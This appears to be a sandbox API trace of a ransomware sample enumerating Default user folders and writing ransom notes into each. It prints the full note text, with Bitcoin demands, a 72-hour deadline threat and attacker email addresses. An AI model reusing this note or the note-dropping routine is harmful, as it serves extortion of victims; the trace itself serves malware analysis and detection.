	[0180.285] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default"
	[0180.285] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0180.285] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Start Menu" | out: lpString1="C:\\Users\\Default\\Start Menu") returned="C:\\Users\\Default\\Start Menu"
	[0180.285] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Start Menu" | out: lpString1="C:\\Users\\Default\\Start Menu") returned="C:\\Users\\Default\\Start Menu"
	[0180.285] lstrcatW (in: lpString1="C:\\Users\\Default\\Start Menu", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Start Menu\\") returned="C:\\Users\\Default\\Start Menu\\"
	[0180.285] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Default\\Start Menu\\" | out: lpString1="C:\\Users\\Default\\Start Menu\\") returned="C:\\Users\\Default\\Start Menu\\"
	[0180.285] lstrcatW (in: lpString1="C:\\Users\\Default\\Start Menu\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Start Menu\\*.*") returned="C:\\Users\\Default\\Start Menu\\*.*"
	[0180.285] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Start Menu\\*.*" (normalized: "c:\\users\\default\\start menu\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f68332, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84f68332, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84f68332, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0180.286] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0180.286] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Start Menu" | out: lpString1="C:\\Users\\Default\\Start Menu") returned="C:\\Users\\Default\\Start Menu"
	[0180.286] lstrcatW (in: lpString1="C:\\Users\\Default\\Start Menu", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Start Menu\\*.*") returned="C:\\Users\\Default\\Start Menu\\*.*"
	[0180.286] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.286] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.286] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\Start Menu\\HELP_DECRYPT_YOUR_FILES.TXT") returned 55
	[0180.286] CreateFileW (lpFileName="C:\\Users\\Default\\Start Menu\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\start menu\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.288] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0180.288] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0180.291] CloseHandle (hObject=0x380) returned 1
	[0180.291] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.291] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.292] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0180.293] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0180.293] CreateFileW (lpFileName="C:\\Users\\Default\\Start Menu\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\start menu\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.293] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0180.293] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0180.293] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0180.293] CloseHandle (hObject=0x380) returned 1
	[0180.294] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.294] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.294] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0180.294] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\Start Menu\\HELP_DECRYPT_YOUR_FILES.HTML") returned 56
	[0180.294] CreateFileW (lpFileName="C:\\Users\\Default\\Start Menu\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\start menu\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.301] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0180.302] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0180.304] CloseHandle (hObject=0x380) returned 1
	[0180.304] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.305] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.305] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.305] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0180.306] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.306] CreateFileW (lpFileName="C:\\Users\\Default\\Start Menu\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\start menu\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.307] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0180.307] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.307] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0180.307] CloseHandle (hObject=0x380) returned 1
	[0180.307] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Start Menu\\*.*" (normalized: "c:\\users\\default\\start menu\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f68332, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84f68332, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84f68332, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0180.308] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0180.308] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1
	[0180.308] lstrcmpW (lpString1="Templates", lpString2="..") returned 1
	[0180.308] lstrcmpW (lpString1="Templates", lpString2=".") returned 1
	[0180.308] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default"
	[0180.308] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0180.308] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Templates" | out: lpString1="C:\\Users\\Default\\Templates") returned="C:\\Users\\Default\\Templates"
	[0180.308] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Templates" | out: lpString1="C:\\Users\\Default\\Templates") returned="C:\\Users\\Default\\Templates"
	[0180.309] lstrcatW (in: lpString1="C:\\Users\\Default\\Templates", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Templates\\") returned="C:\\Users\\Default\\Templates\\"
	[0180.309] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Default\\Templates\\" | out: lpString1="C:\\Users\\Default\\Templates\\") returned="C:\\Users\\Default\\Templates\\"
	[0180.309] lstrcatW (in: lpString1="C:\\Users\\Default\\Templates\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Templates\\*.*") returned="C:\\Users\\Default\\Templates\\*.*"
	[0180.309] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Templates\\*.*" (normalized: "c:\\users\\default\\templates\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f68332, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84f68332, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84f68332, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0180.309] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0180.309] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Templates" | out: lpString1="C:\\Users\\Default\\Templates") returned="C:\\Users\\Default\\Templates"
	[0180.309] lstrcatW (in: lpString1="C:\\Users\\Default\\Templates", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Templates\\*.*") returned="C:\\Users\\Default\\Templates\\*.*"
	[0180.309] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.310] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.310] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\Templates\\HELP_DECRYPT_YOUR_FILES.TXT") returned 54
	[0180.310] CreateFileW (lpFileName="C:\\Users\\Default\\Templates\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\templates\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.314] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0180.314] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0180.317] CloseHandle (hObject=0x380) returned 1
	[0180.317] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.318] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.318] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0180.319] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0180.319] CreateFileW (lpFileName="C:\\Users\\Default\\Templates\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\templates\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.319] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0180.319] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0180.319] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0180.320] CloseHandle (hObject=0x380) returned 1
	[0180.320] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.320] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.320] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0180.320] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\Templates\\HELP_DECRYPT_YOUR_FILES.HTML") returned 55
	[0180.321] CreateFileW (lpFileName="C:\\Users\\Default\\Templates\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\templates\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.321] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0180.321] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0180.324] CloseHandle (hObject=0x380) returned 1
	[0180.324] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.324] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.325] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.325] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0180.338] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.338] CreateFileW (lpFileName="C:\\Users\\Default\\Templates\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\templates\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0180.338] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0180.339] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.339] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0180.339] CloseHandle (hObject=0x380) returned 1
	[0180.339] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Templates\\*.*" (normalized: "c:\\users\\default\\templates\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f68332, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84f68332, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84f68332, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0180.339] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0180.339] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1
	[0180.340] lstrcmpW (lpString1="Videos", lpString2="..") returned 1
	[0180.340] lstrcmpW (lpString1="Videos", lpString2=".") returned 1
	[0180.340] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default"
	[0180.340] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0180.340] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Videos" | out: lpString1="C:\\Users\\Default\\Videos") returned="C:\\Users\\Default\\Videos"
	[0180.340] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Videos" | out: lpString1="C:\\Users\\Default\\Videos") returned="C:\\Users\\Default\\Videos"
	[0180.340] lstrcatW (in: lpString1="C:\\Users\\Default\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Videos\\") returned="C:\\Users\\Default\\Videos\\"
	[0180.340] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Default\\Videos\\" | out: lpString1="C:\\Users\\Default\\Videos\\") returned="C:\\Users\\Default\\Videos\\"
	[0180.340] lstrcatW (in: lpString1="C:\\Users\\Default\\Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Videos\\*.*") returned="C:\\Users\\Default\\Videos\\*.*"
	[0180.341] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Videos\\*.*" (normalized: "c:\\users\\default\\videos\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x84aa35ca, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0180.341] lstrlenW (lpString="C:\\Users\\Default\\Videos\\*.*") returned 27
	[0180.341] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
